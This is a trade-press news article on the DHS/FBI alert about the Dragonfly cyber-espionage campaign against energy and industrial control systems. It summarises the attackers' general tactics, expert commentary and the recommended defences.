DHS, FBI Identify Tactics in Cyberattack Campaign Targeting Industrial Control Systems

The Department of Homeland Security (DHS) and Federal Bureau of Investigation (FBI) warned in an e-mail on October 20 that an ongoing cyberattack campaign is targeting the nuclear, energy, and other critical infrastructure sectors since at least May 2017—with results ranging from cyber espionage to the ability to disrupt energy systems in the event of a hostile conflict.

The federal agencies on October 20 also released a joint technical alert, which provides information on what they deem are “advanced persistent threat” actions. The report outlines “indicators of compromise” as well as technical details on the tactics, techniques, and procedures used by the threat actors on compromised networks.

The alarm sounded by the DHS and FBI is serious and should be heeded, said Dana Tamir, vice president of Market Strategy for Indegy, a cybersecurity solutions and technology firm.

“This is the first time we are seeing such a widespread campaign that is specifically targeting industrial control systems (ICS) which are responsible for managing and controlling the physical processes in nuclear, water, aviation, and critical manufacturing sectors,” she told POWER on October 23.

The Dragonfly Threat

Security threats aimed at power companies have been on the rise and are growing more diverse, experts generally note. Following the unprecedented disruption of electric grid operations in Ukraine on December 23, 2015—an attack attributed to the use of BlackEnergy 3 malware—a second attack employing CrashOverride malware in December 2016 left portions of Kiev without power.

On October 10, cybersecurity firm FireEye reported its devices detected and blocked spear-phishing emails sent on September 22 to U.S. electric companies by threat actors “likely affiliated with the North Korean government.” But the firm reported that the activity was “early-stage reconnaissance, and not necessarily indicative of an imminent, disruptive cyber attack that might take months to prepare if it went undetected (judging from past experiences with other cyber threat groups).”  It added that it had not observed suspected North Korean actors using any tool or method specifically designed to compromise or manipulate the ICS networks, concluding that the actors may not “have access to any such capability at this time.”

The joint analysis report by the DHS and FBI released on Friday, however, describes “distinct indicators and behaviors” of a potentially more disruptive cyberattack campaign, and it points specifically to Dragonfly, a group that has reportedly stepped up cyberattacks aimed at severely crippling operations in the European and North American energy sectors.

Few details are publicly available about what Dragonfly is, where the threat actors are based, and what motivates them. The DHS lists the threat under “reported Russian military and civilian intelligence services,” along with BlackEnergy, Energetic Bear, and Havex.

IT security firm Symantec in a September alert said that the group, which has been in operation since at least 2011, launched a renewed campaign, “Dragonfly 2.0,” in December 2015. The firm warned it has seen a “distinct increase in activity in 2017.

Specific Operational Technology Targets

According to the DHS/FBI report, Dragonfly’s campaign comprises two distinct categories of victims: staging and intended targets.

“The initial victims [which the report refers to as “staging targets”] are peripheral organizations such as trusted third party suppliers with less secure networks,” the report says. “The threat actor uses the staging targets’ networks as pivot points and malware repositories when targeting their final intended victims.”

It adds: “The ultimate objective of the cyber threat actors is to compromise organizational networks, which are referred throughout this alert as ‘intended target.’”

Indegy cybersecurity expert Tamir on October 23 told POWER that the campaign appears to be specifically targeting operational technology (OT), and it illustrates “that attackers are intent on gathering very specific intelligence on operational networks and the technologies they can use to plan future attacks.”

The severity of an attack cannot be understated. Once inside an operational network, attackers have free rein since ICS environments lack both authentication and encryption controls, she said.

“It is important to understand that ICS networks are often lack security controls. Therefore, once an adversary gains access, there is no way to restrict their activities. This is because most of these systems were designed and implemented decades ago, before cyber-threats existed. As a result, these systems are very sensitive to such attacks and can be easily compromised if infiltrated,” she explained.

“In other words, every user has administrative privileges and can make engineering level changes to control devices that manage processes. Therefore, unless the organization has invested in monitoring tools that can detect anomalies and changes made to individual control devices, an attack would only be detected after damage begins to occur.”

Widespread Tactics

According to the DHS, the group’s tactics, techniques, and procedures outlined in the analysis were identified using the Cyber Kill Chain framework developed by defense contractor Lockheed Martin. The framework seeks to pinpoint what threat actors must complete to achieve their objective.

Dragonfly actors, it said, have so far employed a variety of attacks, including:

  • open-source reconnaissance
  • spear-phishing emails (from compromised legitimate accounts)
  • watering-hole domains
  • host-based exploitation
  • ICS infrastructure targeting
  • ongoing credential gathering.

Significantly, the report notes that the threat actors “appear to have deliberately chosen the organizations they targeted, rather than pursuing them as targets of opportunity.”

Staging targets, or initial victims, already had preexisting relationships with many of the intended targets, and the threat actors are actively accessing publicly available information hosted by the organization-monitored networks. “DHS further assesses that threat actors are seeking to identify information pertaining to network and organizational design, as well as control system capabilities, within organizations,” it says.

This type of “open-source reconnaissance of their targets,” is a common tactic used for targeted spear-phishing attempts. However, DHS also warned that threat actors are actively seeking out operationally sensitive information that is available in innocuous materials on company websites. In one case, for example, a small photo of a control system from a publicly accessible human resource page could be expanded to display equipment models and status information in the background. Threat actors also seemed interested—but have so far failed to compromise—web-based remote access infrastructure, like websites, remote email access portals, and virtual private network connections.

Also notable is that the threat actors used a spear-phishing email campaign that was different from previously reported tactics. It essentially used a generic contract agreement theme with the subject line “AGREEMENT & Confidential”, and which contained a generic PDF document, titled “’’document.pdf”. But while the PDF wasn’t itself malicious, it prompted the user to click on a shortened URL if the download should not automatically begin. That link then redirected users to a website, prompting them to retrieve a malicious file.

The report also warns of that threat actors developed “watering holes” by compromising and altering the infrastructure of trusted organizations to reach intended targets. “Approximately half of the known watering holes are trade publications and informational websites related to process control, ICS, or critical infrastructure,” the report says. “ Using a server message block (SMB) collection technique, the actors manipulated these websites by altering JavaScript and PHP files that redirect to an IP address on port 445 to credential harvesting.”

However, the actors more likely used “legitimate credentials” to access website content directly, it says.

Highly Vulnerable Systems

According to Tamir, while the threat is widespread and unprecedented, “basic monitoring and auditing capabilities that are commonplace in IT networks are sorely lacking in industrial networks.”

Other experts agree. Some, like Michael Assante, ICS/SCADA lead for the SANS Institute, a cybersecurity training firm, go as far as to warn that risks to OT are so real, “it’s dangerous and perhaps even negligent for business leaders to ignore it,” he said on October 24.

On October 24, meanwhile, CyberX, a firm that provides an industrial cybersecurity platform for continuously reducing ICS risk, released a report analyzing data from 375 representative OT networks worldwide across all sectors—including energy and utilities, manufacturing, pharmaceuticals, chemicals, and oil and gas. It found that a third of industrial sites were connected to the internet. More than 75% of sites had obsolete Windows systems like Windows XP and 2000, and nearly three of five sites had plain-text password traversing their control networks. More worryingly, more than half of the sites did not have anti-virus protection; another 50% had at least one unknown or rogue device; 20% had wireless access points; and 82% ran remote management protocols.

The DHS/FBI report acknowledges these gaps and recommends measures and general best practices to thwart a Dragonfly attack in a long list. [For more, see “General Best Practices to Thwart a Dragonfly Cyberattack.”]

Essentially, the federal agencies’ report recommends that network administrators review the IP addresses, domain names, file hashes, and YARA and Snort signatures provided and add the IPs to their watch list to determine whether malicious activity is occurring within their organization. It also recommends users and administrators actively work to detect spear phishing, watering hole, web shell, and remote access activity by comparing all IP addresses and domain names listed in the report’s appendix to logs.

The DHS also specifically instructs anyone who identifies the use of tools or techniques it identified to report them to the DHS or law enforcement immediately at NCCICcustomerservice@hq.dhs.gov (link sends e-mail) or 888-282-0870.

—Sonal Patel is a POWER associate editor (@sonalcpatel, @POWERmagazine)